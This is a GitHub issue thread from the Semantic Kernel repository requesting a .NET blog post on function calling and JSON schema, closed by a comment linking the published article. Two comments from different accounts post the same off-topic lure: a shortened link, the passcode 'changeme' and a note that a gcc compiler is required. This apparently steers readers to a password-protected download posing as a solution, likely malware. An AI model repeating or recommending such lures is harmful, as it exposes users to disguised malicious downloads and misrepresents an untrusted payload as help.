### ISSUE TITLE
.Net: Create a Blog post on Function schema for .Net

### ISSUE THREAD

**Issue by markwallace-microsoft** [microsoft/semantic-kernel#8534]
Equivalent article to this one https://devblogs.microsoft.com/semantic-kernel/diving-into-function-calling-and-its-json-schema-in-semantic-kernel-python/

Or possibly update the above.

**Comment by z3t444** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by RamonAlvesPS** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by shethaadit** [comment]
The .NET equivalent article for function calling and JSON schema in Semantic Kernel has been published! It can be found here: [Diving into Function Calling and its JSON Schema in Semantic Kernel .NET](https://devblogs.microsoft.com/semantic-kernel/diving-into-function-calling-and-its-json-schema-in-semantic-kernel-net/). Feedback and thoughts are welcomed!
